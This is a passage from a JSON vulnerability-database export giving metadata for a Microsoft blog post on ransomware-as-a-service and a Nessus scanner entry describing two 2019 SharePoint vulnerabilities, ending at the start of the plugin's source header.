6.0}, "published": "2022-05-09T13:00:00", "type": "mssecure", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-20016", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-31207", "CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-05-09T13:00:00", "id": "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "href": "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-25T14:17:32", "description": "The Microsoft Sharepoint Server installation on the remote host is missing a security update. It is, therefore, affected by the following vulnerabilities:\n\n - A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server. The attacker who successfully exploited the vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user. The attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user. The security update addresses the vulnerability by helping to ensure that SharePoint Server properly sanitizes web requests. (CVE-2019-0778)\n\n - A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account. Exploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected versions of SharePoint.(CVE-2019-0604)", "cvss3": {}, "published": "2019-03-14T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Sharepoint Server (March 2019)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0604", "CVE-2019-0778"], "modified": "2023-04-14T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint_server", "cpe:/a:microsoft:sharepoint_foundation"], "id": "SMB_NT_MS19_MAR_OFFICE_SHAREPOINT.NASL", "href": "https://www.tenable.com/plugins/nessus/122859", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122859);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/14\");\n\n script_cve_id(\"CVE-2019-0604\", \"CVE-2019-0778\");\n